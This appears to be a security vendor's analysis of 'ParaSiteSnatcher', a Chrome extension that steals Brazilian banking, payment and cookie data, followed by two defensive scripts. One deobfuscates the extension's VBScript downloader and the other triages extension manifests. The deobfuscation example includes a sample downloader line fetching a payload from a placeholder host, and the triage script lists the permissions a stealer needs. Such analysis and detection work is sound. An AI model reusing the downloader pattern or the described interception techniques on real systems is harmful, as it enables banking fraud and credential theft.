Our investigations on potential security threats uncovered a malicious Google Chrome extension that we named "ParaSiteSnatcher." The ParaSiteSnatcher framework allows threat actors to monitor, manipulate, and exfiltrate highly sensitive information from multiple sources. It uses the Chrome browser API to intercept and exfiltrate all POST requests containing sensitive account and financial information before the HTTP request initiates a transmission control protocol (TCP) connection, that is, while the request body is still available to the extension and before it ever leaves the browser.

Our research shows that the malicious extension is specifically designed to target users in Latin America, particularly Brazil: it exfiltrates data from Banco do Brasil- and Caixa Econômica Federal (Caixa)-related URLs. It can also initiate and manipulate transactions in PIX, the Brazilian instant payment ecosystem, and payments made through Boleto Bancário, another payment method regulated by the Central Bank of Brazil. We also observed that it can exfiltrate Brazilian Tax ID numbers for both individuals and businesses (CPF and CNPJ, respectively), as well as cookies, including those used for Microsoft accounts.

Once installed, the extension relies on the extensive permissions declared in its manifest to manipulate web sessions and web requests and to track user interactions across multiple tabs through the Chrome tabs API. The malware includes various components that facilitate its operation: content scripts that inject malicious code into web pages, monitor Chrome tabs, and intercept user input and web browser communication. It is worth noting that while ParaSiteSnatcher specifically targets Google Chrome, the malicious extension will also work on any browser that supports the Chrome extension API and runtime, such as Chromium-based browsers like newer versions of Microsoft Edge, Brave, and Opera. The extension could potentially be made compatible with Firefox and Safari as well, but changes such as the browser namespace (browser.* instead of chrome.*) would be necessary.

ParaSiteSnatcher is downloaded through a VBScript downloader hosted on Dropbox and Google Cloud and installed onto the infected system. Our analysis has identified three distinct variants of the VBScript downloader, characterized by differing levels of obfuscation and complexity:

Variant 1: This variant presents a straightforward approach where the payload is not obfuscated, making it relatively easy to analyze and understand.

Variant 2: In this iteration, critical strings within the payload are obfuscated using a reverse-string technique. This adds a layer of complexity to the code, requiring the strings to be reversed again to recover the original content.

Variant 3: This variant incorporates additional obfuscation techniques on top of the string reversal.
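The reverse-string variant of the downloader is undone by a one-line operation once the wrapped strings are located. The following is an added example (it is not code from the original post or from the ParaSiteSnatcher loader) that assumes the obfuscated strings are passed to VBScript's built-in StrReverse() function; the post itself only says "reverse-string technique". The sample script is constructed for the example and uses a placeholder host rather than the real Dropbox or Google Cloud URLs.

```javascript
// Added example: undo reverse-string obfuscation in a VBScript downloader.
// Assumption (not stated in the post): strings are wrapped in StrReverse("...").
// The sample script below is constructed; it is not the actual loader.

// VBScript escapes a double quote inside a literal by doubling it ("").
function unescapeVb(lit) { return lit.replace(/""/g, '"'); }
function escapeVb(s) { return s.replace(/"/g, '""'); }

// Matches StrReverse("literal"), allowing doubled quotes inside the literal.
const STRREVERSE_CALL = /StrReverse\(\s*"((?:[^"]|"")*)"\s*\)/gi;

// Replace every StrReverse("...") call with the plain literal it produces.
// Unescape first so that a doubled quote is reversed as one character.
function deobfuscateReversedStrings(src) {
  return src.replace(STRREVERSE_CALL, (_, lit) => {
    const plain = [...unescapeVb(lit)].reverse().join("");
    return `"${escapeVb(plain)}"`;
  });
}

// Pull URLs out of the cleaned script: the indicators a responder wants first.
function extractUrls(src) {
  return [...src.matchAll(/https?:\/\/[^\s"']+/gi)].map((m) => m[0]);
}

// Constructed sample in the style of the obfuscated variant (placeholder host).
const SAMPLE_VBS = [
  'Set objHTTP = CreateObject(StrReverse("PTTHLMX.2lmxsM"))',
  'objHTTP.Open StrReverse("TEG"), StrReverse("piz.daolyap/dilavni.elpmaxe//:sptth"), False',
  'objHTTP.Send',
].join("\r\n");

const cleaned = deobfuscateReversedStrings(SAMPLE_VBS);
console.log(cleaned);
console.log(extractUrls(cleaned));
```

Running the script prints the readable downloader (CreateObject("Msxml2.XMLHTTP"), a GET to the placeholder URL) and the extracted URL list. For the third variant, which layers further obfuscation on top of the reversal, this pass is only the first step; whatever encoding sits above it has to be peeled off before the StrReverse() calls become visible.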
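The capabilities described above (intercepting POST bodies, reading cookies, tracking tabs, injecting content scripts everywhere) each map to a permission that an extension has to declare in its manifest, so the manifest alone is a useful triage point when hunting for this class of stealer in a fleet. The following is an added example, not code from the original post or from the ParaSiteSnatcher extension: it scores a manifest.json for that combination. The manifest it checks is constructed for the example and is not ParaSiteSnatcher's real manifest; the RISKY_PERMISSIONS table is the author's mapping of the post's described behaviours to standard Chrome permission names.

```javascript
// Added example: triage an extension manifest for the permission set that a
// session/traffic stealer like the one described in the post needs.
// The sample manifest below is constructed; it is not the real extension's.

// Permissions that grant the behaviours described in the post (author's mapping).
const RISKY_PERMISSIONS = {
  webRequest: "observe every HTTP request, including POST bodies via requestBody",
  webRequestBlocking: "block or modify requests before they leave the browser",
  cookies: "read session cookies for any host covered by host permissions",
  tabs: "enumerate and track activity across all open tabs",
  scripting: "inject code into pages on demand",
};

// <all_urls> or an all-host wildcard pattern grants access to every site.
function broadHostMatch(pattern) {
  return pattern === "<all_urls>"
    || /^\*:\/\/\*\//.test(pattern)
    || /^https?:\/\/\*\//.test(pattern);
}

function triageManifest(manifest) {
  const findings = [];
  const perms = new Set([
    ...(manifest.permissions || []),
    ...(manifest.optional_permissions || []),
  ]);
  for (const [perm, why] of Object.entries(RISKY_PERMISSIONS)) {
    if (perms.has(perm)) findings.push(`permission ${perm}: ${why}`);
  }
  // MV2 lists host patterns inside permissions; MV3 moves them to host_permissions.
  const hosts = [
    ...(manifest.host_permissions || []),
    ...[...perms].filter((p) => p.includes("://") || p === "<all_urls>"),
  ];
  const allHosts = hosts.some(broadHostMatch);
  if (allHosts) findings.push("host access: all URLs");
  // A content script matching every page can read banking pages and form input.
  for (const cs of manifest.content_scripts || []) {
    if ((cs.matches || []).some(broadHostMatch)) {
      findings.push(`content_script on all URLs: ${(cs.js || []).join(", ")}`);
    }
  }
  // The pairing that lets an extension lift POST bodies and steal cookies site-wide.
  const canStealTraffic = perms.has("webRequest") && allHosts;
  const canStealCookies = perms.has("cookies") && allHosts;
  const verdict = canStealTraffic && canStealCookies ? "HIGH"
    : findings.length ? "MEDIUM" : "LOW";
  return { findings, canStealTraffic, canStealCookies, verdict };
}

// Constructed sample manifest (MV3 shape) for the example.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Sample Helper",
  permissions: ["webRequest", "cookies", "tabs", "storage"],
  host_permissions: ["<all_urls>"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
  background: { service_worker: "background.js" },
};

const report = triageManifest(SAMPLE_MANIFEST);
console.log(report.verdict, report.findings);
```

The verdict is deliberately coarse: plenty of legitimate extensions (ad blockers, password managers) carry webRequest plus broad host access, so a HIGH score is a prompt to pull the background and content scripts and look for request-body capture, cookie reads, and outbound posts to unfamiliar hosts, not a conviction on its own.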